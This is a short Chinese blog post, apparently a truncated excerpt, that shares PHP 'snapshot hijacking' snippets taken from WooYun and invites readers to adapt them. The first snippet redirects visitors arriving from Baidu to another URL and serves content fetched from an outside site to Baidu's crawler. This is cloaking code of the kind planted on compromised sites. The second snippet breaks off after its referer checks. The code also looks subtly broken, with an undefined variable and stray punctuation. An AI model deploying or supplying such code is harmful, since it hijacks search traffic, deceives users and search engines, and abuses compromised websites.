在乌云上看见的几个php快照劫持代码 在这记录一下 大家用的时候 改一下 自己发挥第一个php
$file=”http://www.xxx.com”;
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);
if(strstr($referer,”baidu”)&&strstr;($referer,”456″))
{
Header(“Location: $url”);
}
if(ereg(“http://www.baidu.com/search/spider.htm”,$agent))
{
$content=file_get_contents($file);
echo $content;
exit;
}
?第二个php
error_reporting(0);
$refer=$_SERVER['HTTP_REFERER'];
if(stristr($refer,"baidu.com")||stristr($refer,"sogou.com")||stristr($refer,"soso.com")||stristr($refer,"google.cn")||stristr($refer,"bing.com")||stristr($refer,"youdao.com")||
...
继续阅读
(30)